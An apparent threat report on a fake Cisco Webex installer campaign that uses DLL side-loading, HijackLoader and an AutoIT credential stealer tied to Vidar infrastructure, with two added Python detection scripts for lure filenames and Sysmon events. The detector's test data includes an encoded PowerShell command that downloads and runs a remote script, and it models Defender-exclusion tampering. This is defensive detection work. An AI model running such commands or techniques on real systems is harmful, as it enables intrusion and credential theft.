Weaponized Cisco Webex Meetings App

Researchers have analyzed a novel information-stealing campaign, detailing the attackers' tactics, techniques, and procedures (TTPs) across the attack lifecycle and mapping them to the MITRE ATT&CK framework to identify potential detection points.

By examining the campaign's behavior and its communication with the command and control (C2) server, the researchers reconstruct the step-by-step progression from initial access to credential theft.


Adversaries employed social engineering to trick users into downloading password-protected archives (ZIP) disguised as legitimate software.


The archive filenames contained the password (for example, !$Full_pAssW0rd_4434_$etup.zip), and the ZIP embedded a RAR archive and text files.

VirusTotal search results for similar filenames

A VirusTotal search revealed around 400 similar filenames submitted since 2024, indicating a broader campaign. The attackers appear to target users searching for pirated software: the names reuse common search terms and recurring markers such as "!@Full_FiIe_lnSide@!" or "!@passcode_", and they mix in look-alike characters (an uppercase I in "FiIe", a lowercase l in "lnSide") that naive string matching on the expected spelling would miss.
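The filename patterns above are a cheap hunting signal on their own. The following Python is an added example (not code from Trellix or from the article) that scores archive names for the traits described: a password word spelled with substitutions, a pirated-software lure, leading punctuation, digits and stray capitals inside words. The weights, the threshold and all sample names except the first are this example's assumptions.

```python
import re
from dataclasses import dataclass, field

# Heuristics for archive names that advertise their own password or lure with a
# "full file inside" promise. Built from the patterns quoted above; weights and the
# threshold are this example's assumptions, not Trellix's detection rules.
ARCHIVE_EXT = re.compile(r"\.(?:zip|rar|7z)$", re.IGNORECASE)
PASSWORD_WORD = re.compile(r"p[a@4]ss(?:w[o0]rd|c[o0]de)", re.IGNORECASE)
LURE_WORD = re.compile(r"full[_ ]?f[il1]+e[_ ]?[il1]ns[il1]de|\$etup|setup", re.IGNORECASE)
LEADING_PUNCT = re.compile(r"^[!@$]{1,3}")
DIGIT_IN_WORD = re.compile(r"[A-Za-z][0-9][A-Za-z]")       # pAssW0rd
CAPITAL_I_IN_WORD = re.compile(r"[a-z]I[a-z]")              # FiIe: uppercase I standing in for l
RANDOM_CASE = re.compile(r"[a-z][A-Z][a-z]+[A-Z]")          # pAssW...: casing no human would type

WEIGHTS = [
    ("password word in name", PASSWORD_WORD, 2),
    ("pirated-software lure word", LURE_WORD, 2),
    ("leading !@$ punctuation", LEADING_PUNCT, 1),
    ("digit substituted inside a word", DIGIT_IN_WORD, 1),
    ("uppercase I inside lowercase word", CAPITAL_I_IN_WORD, 1),
    ("random capitalisation", RANDOM_CASE, 1),
]
THRESHOLD = 3  # assumption: a lure word alone (e.g. "Setup") must not trip the rule


@dataclass
class Verdict:
    filename: str
    score: int = 0
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def score_filename(name: str) -> Verdict:
    """Score one filename; only archives are in scope, anything else scores 0."""
    v = Verdict(name)
    if not ARCHIVE_EXT.search(name):
        return v
    for reason, pattern, weight in WEIGHTS:
        if pattern.search(name):
            v.score += weight
            v.reasons.append(reason)
    return v


def triage(names):
    """Return the suspicious names, highest score first."""
    verdicts = [score_filename(n) for n in names]
    return sorted((v for v in verdicts if v.suspicious), key=lambda v: -v.score)


# Constructed sample set: the first name is the one quoted in the article, the rest are made up.
SAMPLE_FILENAMES = [
    "!$Full_pAssW0rd_4434_$etup.zip",
    "!@Full_FiIe_lnSide@!_Photo_Editor_2024.zip",
    "!@passcode_1234_Video_Editor_Crack.rar",
    "quarterly_report_2024.zip",
    "VLC_Setup_3.0.zip",      # benign installer archive: lure word alone stays below threshold
    "Webex_Setup.exe",        # not an archive, out of scope
]

if __name__ == "__main__":
    for v in triage(SAMPLE_FILENAMES):
        print(f"{v.score:2d}  {v.filename}  <- {', '.join(v.reasons)}")
```

Run over file-creation or download telemetry, this flags the three lure names and leaves the two benign archives alone; the look-alike-character checks are what keep "FiIe"/"lnSide" variants from slipping past a plain substring rule.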

The attacker tricked the user into running Setup.exe, presented as a legitimate Cisco Webex installer. The package relied on DLL side-loading against the genuine ptService.exe module, which loaded a malicious DLL in place of the one it expected and so launched a hidden loader.

The loader then injected itself into a trusted Windows process (more.com) to further conceal its activity. This multi-stage attack combines social engineering (T1204, User Execution), DLL side-loading (T1574.002), and process injection (T1055).

The loader, identified as HijackLoader, fetches and executes an AutoIT script (GraphicsFillRect.au3) that steals credentials and maintains a persistent connection to a C2 server. This stage maps to two MITRE ATT&CK techniques: T1105 (Ingress Tool Transfer) for downloading the script and T1071.001 (Application Layer Protocol: Web Protocols) for the C2 channel. The C2 server's IP address was attributed to Vidar botnet infrastructure.

Exfiltrating to the C2 server

The malicious AutoIT script (GraphicsFillRect.au3) was observed connecting to a C2 server (78.47.78.87) while reading the saved login data of the Chrome and Firefox browsers and of Zoom, consistent with credential exfiltration.

According to Trellix, the script also downloaded additional executables (GCGHJEBGHJ.exe and AFIEGIECGC.exe) into the ProgramData folder, indicating further malicious stages.

Downloads additional PE files

The malware abused the COM Elevation Moniker to bypass User Account Control (T1548.002) and gain administrator privileges, then blinded Windows Defender to its files by adding them to the exclusion list.

Next, the malware injected itself into MSBuild.exe, which connected to a suspicious IP address and downloaded a cryptominer.

Finally, the malware launched a PowerShell script that executed a series of obfuscated commands, ultimately side-loading a malicious DLL through a legitimate VMware process. 
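Each stage of the chain above leaves a distinct host artifact: an unsigned DLL loaded from a user-writable directory, outbound connections from more.com or MSBuild.exe, an AutoIt script run from ProgramData, a new value under the Defender exclusions key, and an encoded PowerShell command. The following Python is an added example (not Trellix's or the article's code) that runs those checks over constructed Sysmon-style events. The Temp path, the side-loaded DLL name, the AutoIt interpreter path, the encoded PowerShell payload and the second IP address are invented for this example; more.com, MSBuild.exe, GraphicsFillRect.au3, the two ProgramData executables, the C2 IP and the Defender exclusions registry key come from the report or from Windows itself.

```python
import base64
import re
from pathlib import PureWindowsPath

# Constructed encoded PowerShell command, built at runtime so the decoder can be checked against it.
PS_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
PS_ENCODED = base64.b64encode(PS_PLAINTEXT.encode("utf-16-le")).decode()

# Constructed Sysmon-style events: ID 1 process create, 3 network connect, 7 image load,
# 13 registry value set. Field names follow Sysmon's schema.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\alice\Downloads\Setup.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "Setup.exe"},
    # genuine ptService.exe dropped next to an unsigned DLL (hypothetical name) that it loads
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\webex\ptService.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\webex\sideloaded_example.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files\Cisco Webex\ptService.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    {"EventID": 3, "Image": r"C:\Windows\System32\more.com",
     "DestinationIp": "78.47.78.87", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\ProgramData\AutoIt3.exe", "ParentImage": r"C:\Windows\System32\more.com",
     "CommandLine": r"AutoIt3.exe C:\ProgramData\GraphicsFillRect.au3"},
    {"EventID": 13, "Image": r"C:\ProgramData\GCGHJEBGHJ.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData"},
    {"EventID": 3, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "DestinationIp": "203.0.113.7", "DestinationPort": 8080},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\ProgramData\AFIEGIECGC.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {PS_ENCODED}"},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.9", "DestinationPort": 443},  # benign browser traffic
]

USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
LOLBINS_NO_NETWORK = {"more.com", "msbuild.exe"}  # injection targets in this chain; neither should talk out
DEFENDER_EXCLUSIONS = "hklm\\software\\microsoft\\windows defender\\exclusions\\"
AU3_PATH = re.compile(r"[A-Za-z]:\\\S+?\.au3", re.IGNORECASE)
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)


def in_user_writable(path: str) -> bool:
    return path.lower().startswith(USER_WRITABLE)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def detect(events):
    """Return (rule, detail) pairs in event order; events that match nothing are dropped."""
    hits = []
    for ev in events:
        eid, image, cmd = ev["EventID"], ev.get("Image", ""), ev.get("CommandLine", "")
        if eid == 7 and in_user_writable(ev["ImageLoaded"]) and ev.get("Signed", "").lower() != "true":
            # hunt lead, not a verdict: legitimate per-user installs also load DLLs from AppData
            hits.append(("dll_sideload_candidate", f"{basename(image)} loaded {ev['ImageLoaded']}"))
        elif eid == 3 and basename(image) in LOLBINS_NO_NETWORK:
            hits.append(("lolbin_network", f"{basename(image)} -> {ev['DestinationIp']}:{ev['DestinationPort']}"))
        elif eid == 13 and ev["TargetObject"].lower().startswith(DEFENDER_EXCLUSIONS):
            hits.append(("defender_exclusion_added", ev["TargetObject"][len(DEFENDER_EXCLUSIONS):]))
        elif eid == 1:
            m = AU3_PATH.search(cmd)
            if m and in_user_writable(m.group(0)):
                hits.append(("autoit_script_from_writable_dir", m.group(0)))
            m = ENCODED_PS.search(cmd)
            if m and basename(image) == "powershell.exe":
                try:  # -EncodedCommand takes base64 of UTF-16LE text; decode it for the analyst
                    decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
                except (ValueError, UnicodeDecodeError):
                    decoded = "<undecodable>"
                hits.append(("encoded_powershell", decoded))
    return hits


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule:32s} {detail}")
```

The side-loading and AutoIt rules are deliberately broad (any unsigned DLL or .au3 under a user-writable path) and are meant as hunt leads to be correlated with the tighter signals, of which a write under the Defender exclusions key and a network connection from more.com or MSBuild.exe are the highest-confidence ones in this chain.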
